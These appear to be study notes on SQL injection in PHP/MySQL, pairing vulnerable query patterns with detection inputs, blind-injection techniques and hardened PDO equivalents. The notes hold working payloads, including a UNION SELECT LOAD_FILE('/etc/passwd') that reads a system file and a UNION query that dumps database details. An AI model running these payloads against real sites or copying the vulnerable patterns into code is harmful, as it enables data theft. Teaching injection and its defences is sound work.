Common Vulnerabilities
1. Improper escape-character handling
$sql = "SELECT * FROM table WHERE field = '" . $_GET["input"] . "'";   // user input spliced straight into a quoted literal
$result = mysql_query($sql);
Detection method: enter a single quotation mark (') in the parameter and watch for a changed response or a database error.
2. Improper handling of types
$sql = "SELECT * FROM table WHERE field = " . $_GET["userid"];   // numeric field, no quotes and no type check
$result = mysql_query($sql);
Common means: 1 UNION ALL SELECT LOAD_FILE('/etc/passwd')
3. Improper assembly of query statements
$sql = "SELECT " . $_GET["column1"] . "," . $_GET["column2"] . " FROM " . $_GET["table"];   // identifiers taken from the request
$result = mysql_query($sql);
Detection method: table=user&column1=user&column2=password
4. Improper handling of errors
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>');   // raw database error returned to the client
Detection method: 1' UNION SELECT 1,concat_ws(CHAR(32,58,32),user(),database(),version()) #
5. Improper handling of multiple submissions
if ($_GET["form1"] == "form1") {}          // checks only run on the first step
if (is_string($_GET["param"])) {}
if (strlen($_GET["param"]) < $max) {}
Means: submit the second form directly, skipping the validation performed on the first one.
6. Other
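Hardened counterparts of patterns 1 to 4 above, added here as an illustration and not part of the original notes. It assumes a PDO connection `$pdo` opened with `PDO::ERRMODE_EXCEPTION` and emulated prepares disabled; the table and column names in the allowlist are placeholders.

```php
<?php
// Added example, not from the original notes. Assumes $pdo is a PDO handle with
// ERRMODE_EXCEPTION and emulated prepares off; table/column names are placeholders.

// Pattern 1: string value -> bind it as a parameter instead of concatenating,
// so a quote in $input stays inside the value and cannot end the literal.
function findByField(PDO $pdo, string $input): array {
    $stmt = $pdo->prepare('SELECT * FROM t WHERE field = :input');
    $stmt->execute([':input' => $input]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Pattern 2: numeric value -> reject anything that is not an integer, then bind
// with an integer type; with an unquoted number the type check is the only guard.
function findByUserId(PDO $pdo, $userid): array {
    if (filter_var($userid, FILTER_VALIDATE_INT) === false) {
        throw new InvalidArgumentException('userid must be an integer');
    }
    $stmt = $pdo->prepare('SELECT * FROM t WHERE id = :id');
    $stmt->bindValue(':id', (int) $userid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Pattern 3: identifiers (table, columns) cannot be bound as parameters, so
// they are checked against a fixed allowlist before being spliced in.
const ALLOWED_COLUMNS = [
    'products' => ['name', 'price'],        // placeholder schema
    'articles' => ['title', 'published_at'],
];
function selectColumns(PDO $pdo, string $table, string $c1, string $c2): array {
    $cols = ALLOWED_COLUMNS[$table] ?? null;
    if ($cols === null || !in_array($c1, $cols, true) || !in_array($c2, $cols, true)) {
        throw new InvalidArgumentException('unknown table or column');
    }
    $sql = sprintf('SELECT `%s`, `%s` FROM `%s`', $c1, $c2, $table);
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Pattern 4: never send the driver's error text to the client; log it
// server-side and return a generic message, so failed queries leak nothing.
function runSafely(PDO $pdo, callable $query): array {
    try {
        return $query($pdo);
    } catch (PDOException $e) {
        error_log($e->getMessage());
        return ['error' => 'request failed'];
    }
}
```

The mysql_* functions used in the snippets above were removed in PHP 7; mysqli prepared statements follow the same bind-then-execute pattern as PDO.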
Common injection methods (e.g. by tampering with requests in Fiddler)
1. GET request
2. POST request
3. Other (Cookie, Host header, other site headers)
Common tools
1. HP WebInspect
2. IBM AppScan
3. WVS
Simple Demo
SQL blind injection
Boolean-based
Related functions: LEFT(), RIGHT()
Time-based
Related function: SLEEP()
$sql = ..... WHERE IF(condition, SLEEP(2), 1) ....
Error-based
Related functions:
$sql = .... AND 2*3=7 .....
Scenarios
MySQL Common functions
SELECT LEFT('1234567', 3);   -- 123
SELECT RIGHT('1234567', 3);  -- 567
SELECT VERSION();            -- 3.3.27-log
SELECT DATABASE();           -- db name
SQL injection attacks